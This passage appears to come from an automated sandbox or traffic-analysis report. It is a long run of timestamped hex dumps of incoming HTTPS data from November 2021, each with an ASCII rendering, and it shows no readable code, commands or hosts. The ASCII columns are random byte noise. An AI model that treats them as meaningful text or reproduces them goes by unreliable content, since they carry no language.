30 18 5f bc 09 79 77 13 c4 e2 e1 dc 61 95 37 04 a3 1f 04 a4 43 e8 45
                                            Data Ascii: F^x^_^.#aa9|GMN6T\e9*?7E{'ojM:UD*rE0GpaBk~n:aA5V/(yq78G<{Hhy2RV'F7grJn21+7> 3S`00_ywa7CE
                                            2021-11-24 14:40:42 UTC79INData Raw: 7c 2a 28 57 b4 f1 36 0e 64 2e dc 9f ae bb 5f 4c ea bd 40 5d d4 95 f5 41 61 e7 af e0 94 95 7f 22 c3 c5 03 4f cf 89 45 26 1c 09 e5 19 10 4f a6 c0 e0 43 cf 78 e6 a4 af 8e 97 bd 36 ef 60 8d 1d cc d3 f2 bd 65 d2 3b ac 81 dc dc 2f 2b 21 74 6a 54 76 ee 2d ba 2b 11 f0 83 02 ed 7c 64 25 98 bd 67 a4 23 db 2f 4c 69 44 b5 a0 1a f6 ba ee 90 17 25 4d dd 5b 22 1d 5e 14 2b 46 d7 41 31 3e 71 61 11 f5 a9 fb 3d 25 d8 ba 12 b0 ac fe a7 52 e7 be 41 d5 4c 66 44 ab 3d 69 cc 5d 41 f9 be 5a fd 6e da 7d ca c1 7a e4 26 65 3c d7 c4 1b 3a b3 75 b3 8c ee d8 40 65 b3 47 66 b1 94 24 78 5c d4 5f 68 50 cc 33 87 3b ac 9d 85 8d 43 50 54 58 16 40 cb e0 bc 4b 58 e9 70 b8 20 2d da cd 5a c6 a5 af 28 11 a8 ba 41 b6 5d 5b cb 21 f0 de d3 70 b3 72 bc 00 69 e1 f8 d1 4c 57 4c 51 c7 57 d8 7a b2 58 55
                                            Data Ascii: |*(W6d._L@]Aa"OE&OCx6`e;/+!tjTv-+|d%g#/LiD%M["^+FA1>qa=%RALfD=i]AZn}z&e<:u@eGf$x\_hP3;CPTX@KXp -Z(A][!priLWLQWzXU
                                            2021-11-24 14:40:42 UTC80INData Raw: 90 28 bc c0 4c f6 fc 1c e6 1a cb b8 8e 02 1b e0 59 cb 9e 13 24 45 78 c5 4e 18 b1 18 ee 9b e6 c0 47 3e 53 82 8f 87 a8 6c 0c b6 8d 3a 38 9c a8 0b 18 cc 5d a1 dc a5 7c a2 df c3 ff 56 c5 85 3e f9 0d 50 c3 61 d6 ff 82 56 9a 29 67 43 2a 3d cf dd 25 1e 33 41 93 ac 22 fb ca 72 30 ce 59 94 00 8e 7a d9 c6 cd ae 68 5a 87 5e 3b 52 67 ef 13 b4 5f 58 bd 40 b7 ef 7c 0f 12 63 34 ed dc 73 3e 62 7e 27 c7 42 42 e7 6b 34 f1 63 4a 82 d1 1b 9b 14 2f 25 d1 62 d5 55 7c f9 e3 3e cd 48 24 8c 51 f9 b7 ab 57 16 36 7d 9c 5a b4 92 76 b3 f7 a3 c8 91 51 e1 23 44 a6 d2 ad 6d 1c ca ab 59 4a 10 13 0d da 12 39 8c 52 c2 15 cc f3 83 49 fd bb 40 0d bf 1a 62 77 77 15 da 0e 37 73 eb 9b cb 65 1a 76 0f 26 ea 99 c6 2c fb af c2 8a 1a 26 56 c6 3e 2d 71 97 fa d1 d3 ae 65 2c 8f 16 72 c1 37 d9 d5 83 80
                                            Data Ascii: (LY$ExNG>Sl:8]|V>PaV)gC*=%3A"r0YzhZ^;Rg_X@|c4s>b~'BBk4cJ/%bU|>H$QW6}ZvQ#DmYJ9RI@bww7sev&,&V>-qe,r7
                                            2021-11-24 14:40:42 UTC81INData Raw: 87 c8 5d 5e 83 b0 c2 86 4f dc af 4a 46 02 26 b4 f7 29 01 77 25 dc 8c 8d b0 a1 4d cc af 7c 53 d4 1e f4 41 61 bc fd e2 94 95 16 26 ad 87 09 4f d8 ed 19 28 e2 0e cb 16 31 1c a4 af f1 2d e7 70 f9 be d3 be 96 ac 3b f7 f1 ce 30 c6 a6 d3 97 5a d1 28 ad f5 e7 d5 2f 30 45 3f 95 55 5c e6 40 d0 bf 11 f6 8a 26 b4 6a 6f 23 e6 9e 78 5a 28 98 7c 4b 7a 4b a9 dc 53 f7 ab e3 85 c1 65 64 de 4a 5e 3e 5c 05 2a 36 92 be 30 14 59 54 07 fd 8c 05 ea da d1 90 1a a3 9c ea b1 10 cc a5 41 79 5b 98 54 91 33 5a f6 5d 4e f8 be 5a fd 6e d5 7a ca ce 7a e4 26 65 31 fe b8 96 d9 b1 0a de a4 7c dd 6a 4d ba 5d 17 ca 9c 32 82 77 f8 5d 7f 4f fc 39 9e ed ad b1 87 ae 41 7b 88 66 8a 6b d0 ea bc 46 a1 66 eb a0 e2 49 cc cb 4c 32 8e 83 2a 06 b0 8a 43 ae 56 5a e7 23 77 dc f8 82 a7 04 eb 43 69 ec ca 0d
                                            Data Ascii: ]^OJF&)w%M|SAa&O(1-p;0Z(/0E?U\@&jo#xZ(|KzKSedJ^>\*60YTAy[T3Z]NZnzz&e1|jM]2w]O9A{fkFfIL2*CVZ#wCi
                                            2021-11-24 14:40:42 UTC82INData Raw: e3 81 91 0f d2 02 54 7d 78 10 32 7f 28 3d 59 3c 8d 81 13 48 f7 d9 cb af 62 c8 94 18 34 d6 2b e3 ad 7a 9b 98 b8 85 ee 61 33 7f 5e fa 39 c8 24 e4 cb 74 24 5c 20 4d e1 24 25 4b 91 e7 78 d8 8b 1d 04 14 81 18 45 ab 61 e0 ad 9c 99 50 3c dd dc 3f 58 ed 4a 0c 28 39 e9 d2 99 aa 7f c1 76 4c 5f 66 c9 65 b4 4c 0b 86 96 e6 43 b2 1b f2 ab 2e 5d fa 03 63 f9 3c 60 84 3b c3 19 54 0c d5 13 df 5c 2d eb 4f ad e6 59 bd a0 00 4f 98 27 4c 1d 72 a0 c5 a4 e6 d3 a8 5e 22 00 12 b6 f1 3c 61 a8 2e dc 97 97 bc 48 9a f3 ae 7c 46 ed b9 c2 9d 14 28 89 e2 9e 92 13 27 df a3 00 4f c3 f1 dc 34 0f 1c eb 22 d7 0d a3 c0 e1 3d eb 15 d2 ac c0 bf be 00 34 ed 09 d9 34 e2 d5 f1 9f 4c e4 30 a3 c6 4a da 2f 27 21 eb 6b 54 7a eb 53 f4 45 25 f4 80 20 85 c6 60 23 f1 83 4d 8a 29 b4 70 5b 5a 49 be e7 98 f3
                                            Data Ascii: T}x2(=Y<Hb4+za3^9$t$\ M$%KxEaP<?XJ(9vL_feLC.]c<`;T\-OYO'Lr^"<a.H|F('O4"=44L0J/'!kTzSE% `#M)p[ZI
                                            2021-11-24 14:40:42 UTC83INData Raw: 55 a1 0b 4b 75 44 15 d9 a2 8e ca 3d b2 46 4d c4 ac 0d f6 84 6b e6 1a 9d bc 7e 4f 5b 83 ee 39 6b f1 11 8b d0 e3 f6 7f db 79 86 df 80 f5 5e c8 8e d3 64 36 87 bf 0f 83 9b b9 2b 42 78 91 6c ea 53 89 9e 45 5c 91 b5 f3 e2 b4 92 9c 88 fb df 05 82 10 1a 9d 16 33 f2 ec 2c fb 0c e7 7a e9 0c 20 30 85 2b 76 46 01 16 52 15 c5 4a ac 93 31 73 17 3b ae c4 83 36 b9 14 3d f6 94 19 78 7f 7c 4b 47 2f 76 b5 a6 67 26 b1 f6 5e 43 d5 de cf 25 8c 95 4c 76 1f 40 de 1f 27 9b 30 6c 77 fc 1c f7 8f d7 59 9c 37 8a e2 45 05 32 cb 24 45 79 4a 4c 1c b7 31 5c 8a ef de 25 39 60 a4 81 90 23 e6 2c a1 ad 9e 2e b4 59 96 1e d9 7c 36 6c a5 7c b3 46 d3 e2 34 1c fc a2 fb 11 db fc f0 89 4b 1e db 99 20 54 60 64 a1 c3 e8 26 08 2f d4 95 a2 36 ff 75 ef 1a d4 51 81 09 01 75 c6 c8 e4 5f 96 5b ab ee 2c 49
                                            Data Ascii: UKuD=FMk~O[9ky^d6+BxlSE\3,z 0+vFRJ1s;6=x|KG/vg&^C%Lv@'0lwY7E2$EyJL1\%9`#,.Y|6l|F4K T`d&/6uQu_[,I
                                            2021-11-24 14:40:42 UTC84INData Raw: d1 59 41 40 8f 11 54 bb 46 96 a6 d7 89 87 45 c7 3e 56 7d 6d 2b 38 63 2c 2c 47 27 de 81 13 48 c0 cc db d8 5c db 90 09 d5 db 6d 92 b9 7a b0 19 99 ef ec 7a 09 6d 52 09 e3 bb 60 49 cb 7e 1d 1e 5c de eb 0c 6e 5f b9 c3 60 b7 05 0a 2a 32 05 75 dc b4 27 f9 b4 b4 a6 5f 23 90 34 0d 76 f1 47 0a 47 a0 f3 bd 17 bd 57 e9 05 72 57 70 f0 10 de 60 09 8c b8 af 9c 1d 13 f0 d0 ea 4e fd 74 ac bd 3e 6a 85 02 83 08 45 10 ee 4b cc 4d 48 4d ca ac ec 4c b0 c3 0d 51 89 27 53 6d 85 5f c4 82 e0 da a9 c8 38 20 0c ee f1 36 04 0b ac dd 9d 80 bf 5a 53 f7 ad 62 56 ed a4 ef 51 99 95 a5 f7 96 99 81 31 b8 bc 58 4f c9 ec 69 a5 1d 0f e1 09 3f 12 b2 d3 e9 2c f6 75 fd 50 c1 99 9d bf 4b 24 0f cf 18 e0 8d ed 86 55 d7 2a a5 f1 e1 20 2e 0d 43 36 63 7c 61 ec 42 f2 39 17 e9 96 39 a2 79 75 2c e8 86 9b
                                            Data Ascii: YA@TFE>V}m+8c,,G'H\mzzmR`I~\n_`*2u'_#4vGGWrWp`Nt>jEKMHMLQ'Sm_8 6ZSbVQ1XOi?,uPK$U* .C6c|aB99yu,
                                            2021-11-24 14:40:42 UTC86INData Raw: 17 32 07 4f 0a 0a a6 f1 5e e6 e1 6b a3 0f 46 9a 26 97 d9 a8 a6 d6 1f 32 4c 65 8f 95 6e fc 8f 71 f2 3f 81 a0 71 59 62 83 ee 39 6f ca 8f 0e e9 1c e9 59 46 c1 b7 c7 96 e7 6f 3f 95 01 35 18 e5 75 0c 9d 49 bd 31 6d ee 19 45 91 95 8b b6 54 d3 26 a8 2b a8 c6 84 b6 97 f0 ac 32 99 ee 11 a0 17 56 e7 f4 21 f1 2d b0 86 e8 2a 2b 3e 1e 58 40 52 ff 1d 56 57 d0 47 a6 b2 6c 8f 16 1d a5 f8 10 b9 a8 fd c3 09 99 73 7d 74 7b 47 69 a1 66 a4 70 5c 29 ae cf b3 72 ff ff 7d 5f 44 95 ff 72 6c 6f ca 0c 24 bb b8 1f 48 fe 1c ec ae 88 a5 9d 11 91 a6 ce 24 41 0b 3b 7f 6b 56 48 16 ab 27 66 65 e7 ec ac 3a 37 5d 90 94 30 62 02 a5 7b 10 13 9c a8 95 36 c6 44 81 66 a7 07 64 43 c5 e4 49 a9 c2 a0 ff 18 5b e6 fc e9 fd 82 c0 b4 76 7e 5c 6f a8 df 54 4a 3e 3e dd 9f 9b 7f e6 8b e4 3f c6 d1 f8 2a 10
                                            Data Ascii: 2O^kF&2Lenq?qYb9oYFo?5uI1mET&+2V!-*+>X@RVWGls}t{Gifp\)r}_Drlo$H$A;kVH'fe:7]0b{6DfdCI[v~\oTJ>>?*
                                            2021-11-24 14:40:42 UTC87INData Raw: 86 7f 7a 4f 56 5c 5a 92 62 04 d9 c8 4e 2b 22 bf 05 aa b0 42 d0 b3 c4 8c 91 14 f5 28 1b 83 73 36 29 47 29 05 d3 cb 64 80 38 64 f4 d5 e8 ac 62 a8 97 03 ca 61 07 e1 97 7a cb d5 b1 af ea 79 87 ed 41 1c 7b 8c 22 4b cb 76 36 2d 60 dc e1 2e 36 37 ca f6 7a d8 8b 23 6a 36 82 6c fe ea 63 ea b1 ac d8 d4 3d d7 cc 7f 64 c4 45 02 28 e8 eb d2 99 94 14 ed 76 46 d9 90 fa 6e 9d 6e 1f 8b 92 97 55 1d 19 f6 87 68 4c 86 bb df f9 38 e4 38 27 c6 08 3e d1 c6 03 ca 39 c3 22 4f ac ee 31 64 8b 1e 5a 07 81 d0 4d 93 a1 c4 a6 dd eb ae 4c 23 00 7e b4 f1 3c 19 b2 a3 f6 9d 86 ae 77 06 e2 be 67 22 df ab f0 5a 1a 5f 89 e2 90 b4 16 22 b8 bc 58 4f c9 ec 11 f1 91 25 e7 1a 3a 70 68 c0 e6 28 f1 72 ce f4 c0 b5 9c ae 21 fe 09 f7 8d c9 d5 f1 97 59 a4 05 a8 ee fe c0 45 52 71 25 6b 5e 58 ac 40 f8 20
                                            Data Ascii: zOV\ZbN+"B(s6)G)d8dbazyA{"Kv6-`.67z#j6lc=dE(vFnnUhL88'>9"O1dZML#~<wg"Z_"XO%:ph(r!YERq%k^X@
                                            2021-11-24 14:40:42 UTC88INData Raw: 0d fb 6d cd af 17 4a d5 58 0c 4b f4 08 2d 44 12 65 20 8b 96 e0 92 51 d2 31 4e e4 6e 8c b3 d1 b1 97 1d 38 6e 08 c6 97 64 e0 c4 66 e0 30 81 b3 05 8d 43 7d eb 1c 77 f4 c5 7f 3c e3 f6 79 2e 1e b7 d6 9d e9 53 e9 d2 2f 65 10 9c c7 ca 9d 4d b1 27 1a 06 94 6e 9b 84 81 ed 7e d0 26 a8 01 93 02 84 bc 82 f2 ac 48 99 ee 11 99 52 27 d8 fc 09 ba 07 f0 8e f9 25 33 25 07 02 7f 50 fd 6c b3 17 d2 43 1b f5 3b 8c 16 1d 0e d7 29 0e c7 eb c0 72 58 0e ae 70 72 52 70 45 fa 81 70 4d 24 ca 26 4d 73 d7 cf 72 0c cb 94 ff 7c 1d 2a 0e 0c 2e a7 d5 1f 49 fe 1c ec 97 c5 d4 a2 19 87 ec 6e 9f bc f4 2e 54 7c 2a 0c 05 a4 32 74 db e4 c0 d1 10 0d 96 90 9e 25 6f 02 ac 22 b6 38 9c aa ec d3 d3 45 85 db ca 6a a3 43 cf 42 64 8e fe d9 34 12 4a e7 86 c7 f9 54 45 b6 36 7c 5e 1e 71 c9 c2 3d 10 31 df 92
                                            Data Ascii: mJXK-De Q1Nn8ndf0C}w<y.S/eM'n~&HR'%3%PlC;)rXprRpEpM$&Msr|*.In.T|*2t%o"8EjCBd4JTE6|^q=1
                                            2021-11-24 14:40:42 UTC90INData Raw: 13 a0 ef fb 4e de e4 e7 8b bb 43 87 40 af 61 5d 47 45 b6 46 33 ee db 41 21 20 b5 3b 45 b1 6e d9 06 d1 92 95 9f ee 1f 9b 79 72 1c 3c e1 2b 3d 48 39 88 75 03 6e e2 e6 16 af 62 df 32 12 c0 c3 13 f5 ae db b0 13 bb b9 62 45 03 7c 5f 07 13 39 25 4b c1 58 37 75 1b dc e3 5f e3 5d b9 cd 0c 59 81 0b 2b 25 86 71 00 26 74 ea bb b5 9f 1a 3e d7 c0 78 7b c6 45 13 2b 66 e9 d2 97 be 2c 23 76 4c 51 61 fe 68 8d 66 93 ae 0c ec 9e 17 bb e3 af 3a 98 ee 74 ce fd 2d 62 b1 67 3a f5 ba 18 c4 78 07 4d 42 26 48 22 c7 4a af 89 65 8b 89 36 58 65 f9 7b c7 d5 32 d8 af 48 47 f0 9e db 77 37 0e 62 04 cf ad 84 ac 75 4c e0 be 6b 56 fc ba e6 4a 4c 8f 89 e5 83 61 04 0c b2 8c 09 4f ce f0 f8 26 30 0d f0 11 38 0a bb 3e e7 00 e5 51 e4 85 23 b7 ed 76 30 ed 0b 41 ab e6 d5 f1 86 6a d4 3b df ee f4 de
                                            Data Ascii: NC@a]GEF3A! ;Enyr<+=H9unb2bE|_9%KX7u_]Y+%q&t>x{E+f,#vLQahf:t-bg:xMB&H"Je6Xe{2HGw7buLkVJLaO&08>Q#v0Aj;
                                            2021-11-24 14:40:42 UTC91INData Raw: d7 57 ba 49 59 a1 6b af 46 eb cd 56 2f 6d cf ab b2 2e eb cd 0d 41 50 23 0e 65 13 64 22 f0 d3 cb 92 55 a0 1c 41 c4 65 94 d9 a2 03 be 1d 32 47 5e c3 86 65 de 3b 69 e1 36 97 a7 6d 55 51 6e fe 18 46 f2 12 f0 16 f0 e2 69 41 e6 21 d7 99 fe 4d c8 85 26 4d cb 9a bc 0a 8b 5b a6 34 7b 2c 87 69 b1 95 88 9e 41 c1 35 b0 3a fb 96 85 b6 95 e5 d6 7f b9 ec 1b b7 01 2d c9 fe 30 f7 6a d8 86 e8 26 34 3b 8d 3d 6e 5d 71 a0 69 cd c1 52 bf 94 06 99 07 1a bd e1 17 18 e9 f9 d3 0c 84 d8 bd 71 6a 4d 61 45 66 a5 61 43 37 a4 c7 ab 62 de aa fe 24 8c 94 ee 73 08 8b df da a3 88 d2 6c 76 d4 56 e4 86 c7 d3 8f 1b 87 fd 55 d2 af fc 0c 02 79 59 42 16 a9 57 44 9a e6 ca b4 1c 4e 94 96 82 27 6f 07 b2 ab 89 29 9b 26 20 09 09 56 97 7f aa 57 8b 52 c2 f1 40 4b ea 8c d8 03 4c f2 88 c7 f0 13 d5 93 57
                                            Data Ascii: WIYkFV/m.AP#ed"UAe2G^e;i6mUQnFiA!M&M[4{,iA5:-0j&4;=n]qiRqjMaEfaC7b$slvVUyYBWDN'o)& VWR@KLW
                                            2021-11-24 14:40:42 UTC92INData Raw: 3b c0 cd 8b 98 b2 91 33 28 b2 1b 88 cc 73 ea 44 de 5c e6 8b bb 21 da 55 3f 47 2c 5f 5b 7b cb cd 72 f0 41 2b 32 a3 16 57 b5 7f d6 b5 d2 0d 26 17 f9 21 7e 14 72 1a 2d 7f 28 2c 4c 2e 65 7c 19 63 d8 d9 f0 78 66 d9 96 12 ce 5b 7c e1 86 79 98 08 b0 af e4 09 55 7e 5e 1b 41 d9 21 61 cb 74 35 4d 6e db e1 9f 2e 5d b9 09 78 d8 90 1d 39 3e ba ca d7 ab 61 ea aa be a8 46 c2 d6 e6 06 4b ce 52 de 45 a2 f6 c5 80 b6 57 fe 7c 5b ab 71 d6 6d 84 71 03 86 81 e6 83 e3 18 de a1 3c 4a c7 a9 df f9 3c 74 9c 20 c4 1b 4f 05 d7 fd cf 61 49 33 46 bc e4 d0 bc 8e 01 4c 9a 3c 5c 63 99 bd 3b af d9 d2 be 4b 38 2e be a7 f5 2b 1d 6e 2e cd 97 99 bc a1 4d cc b8 46 14 e3 ba e3 4b 67 85 83 fb 6a 9e 29 26 b3 87 05 55 da ec 06 36 16 10 ec e4 39 21 af d1 e0 3d e0 f4 51 9c 08 aa 9a ae 3a ed 1e c5 03
                                            Data Ascii: ;3(sD\!U?G,_[{rA+2W&!~r-(,L.e|cxf[|yU~^A!at5Mn.]x9>aFKREW|[qmq<J<t OaI3FL<\c;K8.+n.MFKgj)&U69!=Q:
                                            2021-11-24 14:40:42 UTC93INData Raw: 12 6b f7 d2 e1 4b 46 32 05 6b 56 dc 56 8b 5f 57 89 4f 87 f6 e0 db 70 25 6b dc ad a2 5e 1a 59 0c 45 54 4b db 45 12 61 34 6a 25 3f 92 55 a5 60 d2 e5 64 93 db d9 52 95 1d 36 50 d7 bf 77 6e f6 80 04 89 32 81 bb a0 0e 66 55 d8 15 66 f8 00 f8 15 f2 fe 53 3a ce b7 d0 b1 2d 5a c1 92 05 ca 1b 9e ba 2a 8b 5e b2 08 51 38 96 64 4f b6 ac b6 76 d2 26 a8 3a da 03 a4 b7 93 f6 5f 24 4e ea 1b b7 3a 8a d9 f6 27 dd 13 e3 83 c0 18 22 28 82 f5 7f 41 f8 2e f8 16 d2 47 ba 98 56 51 16 17 a8 61 31 19 1d fc 18 1a 9c 1d a5 4c b4 43 76 93 77 d0 ac 4d 26 b5 e7 46 e9 c0 d3 7d 5f 50 95 ff 72 0e 5a df da b4 b0 de 6e 0c 21 1c e6 82 e1 e9 8c 1d 96 ea 52 f7 68 f0 24 43 6e d4 4f 07 a4 39 48 8f f2 e8 78 38 4c 9e b8 08 34 6a 19 b0 a1 8b 10 22 aa 97 18 c5 c8 86 6c a5 7d b6 57 d1 c8 ec da fc a8
                                            Data Ascii: kKF2kVV_WOp%k^YETKEa4j%?U`dR6Pwn2fUfS:-Z*^Q8dOv&:_$N:'"(A.GVQa1LCvwM&F}_PrZn!Rh$CnO9Hx8L4j"l}W
                                            2021-11-24 14:40:42 UTC95INData Raw: 45 95 e5 d1 32 69 2c 86 66 96 5c 31 cc f2 90 a1 6d 80 08 ac a3 1f 04 b1 62 e4 2a c2 45 e7 81 a7 43 80 38 d0 4d 56 5c 23 cb de 1b f5 c8 4c 3a 3e 98 af 56 b1 68 c8 cb bc 81 91 0f d6 01 50 6c 7c 75 1f 6e 2c 37 59 34 8c a9 7d 6c f5 ce d2 c4 08 db 90 09 c6 c6 0c c9 a8 7b b0 15 de c3 ec 7a 09 5a 4f 1a 3d d9 2a 24 ff 76 35 54 31 b2 e3 24 25 7b 92 ef 69 d5 a9 7a 2a 34 84 4b cb ba 6a c2 95 b7 b7 56 53 bb c8 0c 50 e0 54 03 50 bb e7 bd a7 be 57 e5 19 20 57 70 f0 48 8d 6c 1e 50 83 e2 8f 13 08 eb 95 7b b1 02 8f d7 d4 0c 7b 84 02 1f 0e 45 1c a9 6f cc 4d 48 04 5e a6 fd 40 bb a3 a2 5c 89 30 4a ff 94 a1 c5 af e1 cc bb 64 8a 28 24 be d9 27 0e 64 24 b3 f0 84 ac 55 6a f1 b5 45 72 ff ab f6 2e 0b 96 89 e8 b2 91 00 31 bb fb d0 4f c9 ec 57 29 18 49 cb 13 3c 2d 18 c1 e6 2c b3 51
                                            Data Ascii: E2i,f\1mb*EC8MV\#L:>VhPl|un,7Y4}l{zZO=*$v5T1$%{iz*4KjVSPTPW WpHlP{{EoMH^@\0Jd($'d$UjEr.1OW)I<-,Q
                                            2021-11-24 14:40:42 UTC96INData Raw: 93 58 e7 65 db dc f8 93 b1 09 c0 02 41 f2 d2 f3 44 56 27 50 26 57 dc 54 b1 70 da 88 4f a5 6a ea f3 58 34 6d cb d8 86 27 c3 53 76 45 40 02 0f 41 32 9a dd f0 5e d1 99 7d 8f 0d 4c e2 17 c2 d8 a2 84 ef 1f 31 3b 92 c4 97 6a f4 80 16 01 30 81 b5 54 46 43 6e df 16 66 b7 13 f0 16 e3 f6 7b 55 cc b4 d2 b1 4a 5f c1 92 28 4d 95 9f bc 06 b1 46 9d 0e 6b 38 90 1d b7 97 89 94 3b dc 22 8a a6 d2 00 8e 9a 98 de f1 0e 9b e8 68 97 10 25 d2 8c 23 ec 78 11 84 e8 24 20 2d 86 2f 57 28 ff 17 78 6a 30 47 ac 9e 07 8d 16 17 bf df 82 0e 0d eb c2 09 93 0e ae 74 79 6b 61 93 75 a1 72 5b 5b 5d f6 4d 77 d1 c8 02 c9 8c 95 fb 74 1c 2c 2d 0c 2e a7 d0 68 0a 1a 1c e6 82 cf 87 9d 5b 86 e6 cb f4 be f4 25 38 9f 59 48 03 a6 4b 2f 99 e6 ca a6 db 4c 94 94 96 4f 89 13 a1 a9 9d 57 d3 a9 97 14 d1 36 f2
                                            Data Ascii: XeADV'P&WTpOjX4m'SvE@A2^}L1;j0TFCnf{UJ_(MFk8;"h%#x$ -/W(xj0Gtykaur[[]Mwt,-.h[%8YHK/LOW6
                                            2021-11-24 14:40:42 UTC97INData Raw: b2 22 c1 8d d5 31 e6 cb 23 1c 22 ff fb d1 d5 38 7a 20 b9 09 6c 58 26 38 e0 b0 b3 79 86 36 2e b2 1a 1d 49 72 c6 4e f5 45 94 3f b0 52 8a 5c 25 5e 53 56 5d a4 c1 e5 fe f7 48 23 5c cd 11 54 bb 70 c0 a1 d7 92 94 1a f3 c9 57 51 78 13 44 11 2e 3d 42 27 91 6c 17 64 e5 cb c4 55 63 f5 86 05 ef 29 00 57 87 78 b6 60 ca ad ee 70 70 00 5c 11 31 c4 39 58 ce 74 24 5b 45 20 e0 08 25 5a bf b4 93 d8 81 0f 36 27 87 66 c7 ae 77 14 ba 98 b4 47 2f d2 ca 1d 5f d9 4f f6 57 86 eb f9 96 84 78 10 89 b3 7f 6e f8 75 ac 60 09 bd 90 ec 9e d0 19 f2 ba 39 45 e9 7a dc ff 48 fd 8f 2a c5 19 41 08 c2 2b 83 4c 42 28 5e a9 e6 66 a8 8d 6a c9 89 36 5d 58 90 89 bb ac f5 d2 b9 d6 22 f6 2a 91 d9 01 0e 64 24 d1 b5 be ac 5f 46 3e be 6a 7c fc aa e0 41 67 94 89 c2 94 94 2e 20 be 01 02 4f c8 0c 04 0f 0b
                                            Data Ascii: "1#"8z lX&8y6.IrNE?R\%^SV]H#\TpWQxD.=B'ldUc)Wx`pp\19Xt$[E %Z6'fwG/_OWxnu`9EzH*A+LB(^fj6]X"*d$_F>j|Ag. O
                                            2021-11-24 14:40:42 UTC98INData Raw: d8 40 88 68 1d 7d c6 dd f0 4f 68 52 9c 3c 3c 61 43 db 08 34 55 47 94 40 aa 8d 7b 3c 3a 44 bc 90 cf 72 a2 60 7e 0e eb a7 4a fe 95 a9 db 76 6d b5 15 86 9d 01 26 f1 8d f2 d3 42 40 18 ef 8e c6 50 7d 3f 90 f9 bd d6 c4 11 29 51 a7 d8 b4 9a 68 d1 f0 90 eb b6 b7 9c 31 45 3a d0 ad 4e 30 1c a3 41 b4 8d 39 1a 82 89 df 8c 54 c9 90 c6 ec a7 4b 24 26 6a 1b 95 07 6a e5 70 0a f0 0c a7 75 fc a3 15 ef 36 74 17 b6 ec 8e e0 cd b3 1f c6 82 27 30 c2 df 2b e1 50 67 f8 fa d6 0a 3e cc 43 f6 7a 77 22 f6 e2 9c 11 61 95 33 ff a3 1f 15 a1 60 ee 7d 64 47 e7 8b b1 43 88 4c c1 4c 7a 53 55 ab c0 08 fb db 50 2f 2e 4e 12 78 bd 66 d0 b2 ff 40 90 05 fc 3a 48 6e 76 1a 3a 68 35 c3 49 14 9e 68 18 7e e7 ca d8 ba 66 c7 6e 02 e6 dc 0e e3 fb 75 b1 13 b5 b0 e7 69 07 7c 4f 15 21 36 25 67 ce 5f 3e 45
                                            Data Ascii: @h}OhR<<aC4UG@{<:Dr`~Jvm&B@P}?)Qh1E:N0A9TK$&jjpu6t'0+Pg>Czw"a3`}dGCLLzSUP/.Nxf@:Hnv:h5Ih~fnui|O!6%g_>E
                                            2021-11-24 14:40:42 UTC99INData Raw: 6a 12 43 d4 2f 07 fd 9b 39 a8 79 75 26 eb 6b 64 88 34 b6 01 43 68 42 b3 cd 23 e7 bb e8 97 29 66 33 cd 5c 4d 31 d2 a3 4e 80 80 40 3b 25 48 7a 02 d4 ae e4 04 db d9 96 0a b2 ab 81 34 5f a2 20 2e 01 5a 98 43 98 2d 62 c2 5d 57 ea 5f 50 2f 6d e1 63 cd c4 19 14 26 49 3a 93 40 32 d9 bb 07 12 34 39 d7 75 4b a2 41 1b db 91 3c 82 77 f8 53 6a 38 ee 30 87 17 bb b3 d7 9c 50 55 45 5f 18 75 2e e1 97 5a 8d f4 43 b3 2b 23 da db 49 27 b4 7d 2b 2a a5 91 70 b1 b2 49 e2 23 ca d9 e7 9e 4f 08 ec 0c 61 f4 d6 cd e4 aa ce d2 d8 59 cf 55 b2 49 50 96 59 51 47 cd d0 74 22 10 c3 aa a0 21 dc 4e 1f 44 56 21 02 5a 00 9b 23 dc 52 e2 e9 5b a0 0f 48 c8 7b 8a ca b1 8b 95 0c 37 50 b3 c5 bb 6d e1 97 6e e1 21 84 ae 69 b8 42 51 ed 3e 63 ca fc 0d e9 1c dc 7b 55 dd 87 d3 99 fd 5c c1 94 f5 65 1a 8f
                                            Data Ascii: jC/9yu&kd4ChB#)f3\M1N@;%Hz4_ .ZC-b]W_P/mc&I:@249uKA<wSj80PUE_u.ZC+#I'}+*pI#OaYUIPYQGt"!NDV!Z#R[H{7Pmn!iBQ>c{U\e
                                            2021-11-24 14:40:42 UTC100INData Raw: 93 01 3c d7 82 99 3f ff bb ed 36 fe 47 8b 15 c9 7c c6 c8 9e cf 68 5a 8d ce 3f 4e 4f 9f a3 29 59 41 b0 53 a7 7b 15 65 30 43 b2 bc cb 78 7c 75 65 10 b6 b1 49 39 61 a0 db 7a 66 f2 cd 87 9d 01 d6 3d bd fe d2 5a 5a e6 ec a2 cd 57 1e 8f 90 f3 b7 ab cb 10 32 65 b9 d4 b3 93 76 2f 2d bc e1 a0 ad b1 58 4a 3b d4 b6 32 00 1c ab 58 67 87 3d 3c f3 32 d8 ff d1 c0 89 c0 96 ad 06 b5 ee 47 12 94 0f 3f 78 73 0a fe 1f 83 e6 f6 b4 e1 e2 13 08 9c ba ec 8c de f3 b3 33 c2 86 2f 36 a5 54 23 1f 5b 58 fc fa ee 20 65 1b 29 0b 7d 57 22 c3 e2 8d b5 0e 03 31 2e a9 32 2e b5 23 fb 40 fe 28 2d 8a b1 54 a0 49 2e 49 47 53 37 b8 dd 1b fb d3 50 2e 48 aa 12 54 b5 7f d6 df f3 82 91 01 95 f3 57 7d 74 3c 39 6a 04 aa 4a 38 91 52 a8 ba fa dc de 55 74 fe 90 03 d1 b8 50 e1 86 72 6c 11 e1 c0 26 7b 03
                                            Data Ascii: <?6G|hZ?NO)YAS{e0Cx|ueI9azf=ZZW2ev/-XJ;2Xg=<2G?xs3/6T#[X e)}W"1.2.#@(-TI.IGS7P.HTW}t<9jJ8RUtPrl&{
